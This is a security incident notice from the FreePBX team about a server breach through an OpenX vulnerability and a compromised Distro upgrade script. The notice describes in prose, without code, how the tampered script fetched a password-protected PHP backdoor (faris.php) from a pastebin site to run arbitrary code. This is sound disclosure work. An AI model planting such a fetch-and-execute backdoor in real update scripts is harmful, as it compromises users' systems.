Earlier this week we detected a breach to one of our servers as a result of a vulnerability in the OpenX Open Source project that was reported earlier this month. We utilize OpenX within the FreePBX.org server infrastructure. The hacker got to our system prior to us updating the server.
We closed the security hole upon detecting it and have spent many dozens of engineering hours scanning through our systems to isolate areas that might have been compromised.
Shortly into this process, one of our community members reported an anomaly in a Distro upgrade script that was quickly tracked down to a compromised upgrade script on our server. We were able to contain this issue quickly such that only 8 other customers downloaded the script.
Before elaborating on the breach I want to take the opportunity to talk about something positive in the mist of this ugly issue. Our upgrade scripts are open, human readable scripts. As such, thousands of eyes can review our work and it was this process that helped quickly discover and contain the vulnerability. For that we are very grateful!
The vulnerability in the upgrade script does the following. Upon running the upgrade it goes out to a pastebin site and installs a very small script to the following location on the compromised system:
That script is designed to receive two parameters: a password and an arbitrary string that can be decoded and executed in PHP on the compromised server. Since the upgrade script goes out to an anonymous pastebin site to download and install faris.php, the hacker does not know about the compromised system. Therefore, the hacker is not able to directly track the system. This means the hacker must randomly scan the entire internet seeking out systems open to the internet that respond to an http request to the faris.php script. As is the case with many vulnerabilities, the hacker probably had scripts running around the internet looking for this faris.php script so it can download and execute an unknown attack. Our efforts tracking down this vulnerability made it clear that this hacker has compromised other projects and there are certainly scripts out there looking for faris.php Since the hacker protected their vulnerability with a password that is hashed, it makes it extremely difficult for ‘[i]copy-cat[/i]’ hackers to write and scan the internet for such compromised systems to do their own damage.
We are looking at mechanisms to put in place to help further protect against a vulnerability such as this. The FreePBX module admin already has a cross check to md5 hashes when downloading module upgrades. That mechanism is an improvement though by far not immune to being fooled. We are examining the Distro upgrade script process as well as the current Module Admin system to plan on future improvements to further cross check against such attacks or general download corruption.
Although we are still scanning various systems, we feel this is probably the extent of the damage done by this compromise. If we find other issues that need communicating we will do such.
[b]The FreePBX Team[/b]